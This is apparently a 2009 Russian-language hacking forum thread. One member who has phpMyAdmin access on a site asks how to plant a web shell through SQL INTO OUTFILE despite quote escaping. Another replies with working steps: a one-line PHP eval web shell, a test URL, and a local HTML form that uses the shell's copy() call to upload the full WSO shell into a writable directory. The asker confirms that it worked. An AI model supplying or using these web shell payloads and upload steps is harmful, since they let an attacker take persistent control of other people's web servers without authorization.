 |
|
25.10.2009, 17:06
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами:
9851463
Репутация:
19
|
|
outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
|
|
|
25.10.2009, 17:08
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от M1ks
outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
что экранируется? Ты хотя бы <?phpinfo();?> можешь залить? Будет показываться phpinfo() ?
|
|
|
|
25.10.2009, 17:10
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Сообщение от M1ks
outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
омг, что значит работает, но екранизируется?
что экранизируеться?
излагай проблему подробно, дабы тебе смогли помочь.
|
|
|
|
25.10.2009, 17:11
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами:
9851463
Репутация:
19
|
|
да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше
|
|
|
|
25.10.2009, 17:12
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами:
9520453
Репутация:
124
|
|
Если работает outfile, но файл не прочитать - может просто-напросто прав на чтение нет в этот каталог? О_о
Или то, что записывается - просто глюк.
|
|
|
|
25.10.2009, 17:13
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами:
9851463
Репутация:
19
|
|
записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд
|
|
|
|
25.10.2009, 17:15
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами:
9520453
Репутация:
124
|
|
Сообщение от M1ks
записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд
Покажи запрос, которым заливаешь. Возможно, лишний слеш поставил.
|
|
|
|
25.10.2009, 17:16
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от M1ks
да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше
тогда лей wso без html-вставок, последняя версия:
https://forum.antichat.ru/threadedpost1624918.html#post1624918
1. Заливаешь такой шелл:
<?eval(stripslashes($_GET[e]));?>
2. Проверяешь:
Код:
http://site.com/имя_твоего_шелла&e=phpinfo();
или
Код:
http://site.com/имя_твоего_шелла?e=phpinfo();
по разному бывает
3. У себя на компе такую локальную форму творишь (обзываешь .html):
Код:
<form action=http://site.com/имя_твоего_шелла&e=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/www/тут_полный_абсолютный_путь_до_папки_с_правами_на_запись/shell.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form>
4. Запускаешь и льешь wso, всё
Последний раз редактировалось Pashkela; 25.10.2009 в 17:19..
|
|
|
|
25.10.2009, 17:18
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами:
9851463
Репутация:
19
|
|
SELECT 'код шелла' FROM `table` INTO OUTFILE 'путь'
|
|
|
|
25.10.2009, 17:25
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами:
9851463
Репутация:
19
|
|
Pashkela.
Спасибо, получилось
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
